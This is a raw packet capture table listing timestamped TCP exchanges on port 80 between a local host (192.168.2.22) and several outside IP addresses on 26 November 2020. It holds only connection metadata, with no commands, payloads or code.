Nov 26, 2020 21:13:01.232465029 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.232492924 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.232533932 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.232578993 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.232601881 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.232634068 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.232670069 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.232712984 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.232733965 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.232762098 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.232799053 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.232841015 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.232862949 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.232893944 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.232932091 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.232975006 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.232991934 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.233020067 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.233057976 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.233097076 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.233114004 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.233144045 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.233180046 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.233220100 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.233236074 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.233264923 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.233292103 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.233330011 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.233345985 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.233374119 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.233445883 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.233483076 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.233505964 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.233530045 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.233571053 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.233616114 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.233633041 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.233671904 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.233699083 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.233737946 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.233769894 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.233795881 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.233814001 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.233859062 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.233870029 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.233896971 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.233937025 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.233994007 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.234005928 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.234046936 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.234074116 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.234128952 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.234141111 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.234185934 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.234210014 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.234265089 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.234277964 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.234321117 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.234345913 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.234400034 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.234411955 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.234456062 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.234478951 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.234534025 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.234546900 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.234595060 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.234613895 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.234668970 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.234682083 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.234724045 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.234750986 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.234806061 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.234818935 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.234874964 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.234886885 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.234931946 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.234954119 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.235008955 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.235021114 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.235075951 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.235088110 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.235130072 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.235157967 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.235213995 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.235225916 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.235268116 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.235295057 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.235342026 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.235362053 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.235403061 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.235430956 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.235485077 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.235513926 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.235562086 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.235579014 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.235620022 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.235636950 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.235677004 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.235704899 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.235759020 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.235771894 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.235812902 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.235841036 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.235896111 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.235908031 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.235955954 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.235975981 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.236032009 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.236043930 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.236092091 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.236113071 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.236167908 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.236181021 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.236222029 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.236249924 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.236305952 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.236319065 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.236361027 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.236388922 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.236443043 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.236455917 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.236496925 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.236525059 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.236581087 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.236593962 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.236635923 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.236663103 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.236716986 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.236730099 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.236771107 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.236799002 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.236845970 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.236865997 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.236907005 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.236934900 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.236989021 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.237001896 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.237044096 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.237071037 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.237118006 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.237135887 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.237176895 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.237195015 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.237241030 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.237251043 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.237292051 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.237307072 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.237345934 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.237370968 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.237409115 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.237448931 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.237504959 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.237517118 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.237555981 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.237586021 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.237641096 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.237653971 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.237701893 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.670485973 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.670748949 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.788563967 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.788599968 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.788655996 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.788676977 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.906445026 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.906475067 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.906490088 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.906511068 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:01.906532049 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:01.906549931 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:02.024213076 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:02.024235964 CET	80	49165	216.170.126.121	192.168.2.22
Nov 26, 2020 21:13:02.024307966 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:02.442620993 CET	49165	80	192.168.2.22	216.170.126.121
Nov 26, 2020 21:13:48.050718069 CET	49166	80	192.168.2.22	92.42.39.29
Nov 26, 2020 21:13:48.109231949 CET	80	49166	92.42.39.29	192.168.2.22
Nov 26, 2020 21:13:48.109401941 CET	49166	80	192.168.2.22	92.42.39.29
Nov 26, 2020 21:13:48.109751940 CET	49166	80	192.168.2.22	92.42.39.29
Nov 26, 2020 21:13:48.184127092 CET	80	49166	92.42.39.29	192.168.2.22
Nov 26, 2020 21:13:49.131759882 CET	49166	80	192.168.2.22	92.42.39.29
Nov 26, 2020 21:13:49.215440035 CET	80	49166	92.42.39.29	192.168.2.22
Nov 26, 2020 21:13:49.526554108 CET	80	49166	92.42.39.29	192.168.2.22
Nov 26, 2020 21:13:49.526608944 CET	80	49166	92.42.39.29	192.168.2.22
Nov 26, 2020 21:13:49.526648998 CET	80	49166	92.42.39.29	192.168.2.22
Nov 26, 2020 21:13:49.526667118 CET	49166	80	192.168.2.22	92.42.39.29
Nov 26, 2020 21:13:49.526686907 CET	80	49166	92.42.39.29	192.168.2.22
Nov 26, 2020 21:13:49.526706934 CET	49166	80	192.168.2.22	92.42.39.29
Nov 26, 2020 21:13:49.526732922 CET	49166	80	192.168.2.22	92.42.39.29
Nov 26, 2020 21:13:49.526776075 CET	49166	80	192.168.2.22	92.42.39.29
Nov 26, 2020 21:13:54.200645924 CET	49167	80	192.168.2.22	52.58.78.16
Nov 26, 2020 21:13:54.217287064 CET	80	49167	52.58.78.16	192.168.2.22
Nov 26, 2020 21:13:54.217408895 CET	49167	80	192.168.2.22	52.58.78.16
Nov 26, 2020 21:13:54.217690945 CET	49167	80	192.168.2.22	52.58.78.16
Nov 26, 2020 21:13:54.234323025 CET	80	49167	52.58.78.16	192.168.2.22
Nov 26, 2020 21:13:54.234344006 CET	80	49167	52.58.78.16	192.168.2.22
Nov 26, 2020 21:13:54.234352112 CET	80	49167	52.58.78.16	192.168.2.22
Nov 26, 2020 21:13:54.234575987 CET	49167	80	192.168.2.22	52.58.78.16
Nov 26, 2020 21:13:54.234664917 CET	49167	80	192.168.2.22	52.58.78.16
Nov 26, 2020 21:13:54.251241922 CET	80	49167	52.58.78.16	192.168.2.22
Nov 26, 2020 21:13:59.425851107 CET	49168	80	192.168.2.22	66.235.200.146
Nov 26, 2020 21:13:59.442368031 CET	80	49168	66.235.200.146	192.168.2.22
Nov 26, 2020 21:13:59.442477942 CET	49168	80	192.168.2.22	66.235.200.146
Nov 26, 2020 21:13:59.443011999 CET	49168	80	192.168.2.22	66.235.200.146
Nov 26, 2020 21:13:59.459410906 CET	80	49168	66.235.200.146	192.168.2.22
Nov 26, 2020 21:14:00.458651066 CET	49168	80	192.168.2.22	66.235.200.146
Nov 26, 2020 21:14:00.475543976 CET	80	49168	66.235.200.146	192.168.2.22
Nov 26, 2020 21:14:00.475733995 CET	49168	80	192.168.2.22	66.235.200.146
Nov 26, 2020 21:14:05.568221092 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.590717077 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.590825081 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.591139078 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.613476038 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.615524054 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.615550995 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.615567923 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.615585089 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.615602970 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.615617990 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.615637064 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.615667105 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.615683079 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.615689039 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.615701914 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.615717888 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.615751982 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.637974024 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638003111 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638020039 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638034105 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638051987 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638086081 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638102055 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638108969 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.638118029 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638134956 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638148069 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.638153076 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638153076 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.638169050 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638185024 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638197899 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.638204098 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638220072 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.638221979 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638237953 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638263941 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.638299942 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.638329983 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638345957 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638361931 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638380051 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638396025 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.638628006 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.638660908 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.638844013 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660624027 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660654068 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660672903 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660690069 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660706043 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660722971 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660721064 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660737991 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660748005 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660753965 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660753965 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660769939 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660778046 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660782099 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660789013 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660798073 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660809994 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660814047 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660828114 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660829067 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660841942 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660844088 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660847902 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660861015 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660870075 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660878897 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660892010 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660897017 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660897970 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660902977 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660912991 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660912991 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660929918 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660933018 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660943031 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660944939 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660960913 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660965919 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660972118 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660978079 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.660984993 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.660990000 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.661000967 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.661011934 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.661015034 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.661025047 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.661026955 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.661041975 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.661053896 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.661057949 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.661067963 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.661073923 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.661073923 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.661087990 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.661088943 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.661101103 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.661108017 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.661114931 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.661122084 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.661124945 CET	80	49169	188.93.150.44	192.168.2.22
Nov 26, 2020 21:14:05.661144972 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.661153078 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.661180973 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:05.661201000 CET	49169	80	192.168.2.22	188.93.150.44
Nov 26, 2020 21:14:10.723346949 CET	49170	80	192.168.2.22	23.227.38.74
Nov 26, 2020 21:14:10.739470959 CET	80	49170	23.227.38.74	192.168.2.22
Nov 26, 2020 21:14:10.739556074 CET	49170	80	192.168.2.22	23.227.38.74
Nov 26, 2020 21:14:10.739721060 CET	49170	80	192.168.2.22	23.227.38.74
Nov 26, 2020 21:14:10.755805969 CET	80	49170	23.227.38.74	192.168.2.22
Nov 26, 2020 21:14:10.893620014 CET	80	49170	23.227.38.74	192.168.2.22
Nov 26, 2020 21:14:10.893650055 CET	80	49170	23.227.38.74	192.168.2.22
Nov 26, 2020 21:14:10.893666983 CET	80	49170	23.227.38.74	192.168.2.22
Nov 26, 2020 21:14:10.893682957 CET	80	49170	23.227.38.74	192.168.2.22
Nov 26, 2020 21:14:10.893692970 CET	80	49170	23.227.38.74	192.168.2.22
Nov 26, 2020 21:14:10.893701077 CET	80	49170	23.227.38.74	192.168.2.22
Nov 26, 2020 21:14:10.893812895 CET	49170	80	192.168.2.22	23.227.38.74
Nov 26, 2020 21:14:10.893908024 CET	80	49170	23.227.38.74	192.168.2.22
Nov 26, 2020 21:14:10.893950939 CET	49170	80	192.168.2.22	23.227.38.74
Nov 26, 2020 21:14:10.893992901 CET	49170	80	192.168.2.22	23.227.38.74
Nov 26, 2020 21:14:10.894134045 CET	49170	80	192.168.2.22	23.227.38.74
Nov 26, 2020 21:14:16.034001112 CET	49171	80	192.168.2.22	66.96.162.138
Nov 26, 2020 21:14:16.132337093 CET	80	49171	66.96.162.138	192.168.2.22
Nov 26, 2020 21:14:16.132452965 CET	49171	80	192.168.2.22	66.96.162.138
Nov 26, 2020 21:14:16.132878065 CET	49171	80	192.168.2.22	66.96.162.138
Nov 26, 2020 21:14:16.231076002 CET	80	49171	66.96.162.138	192.168.2.22
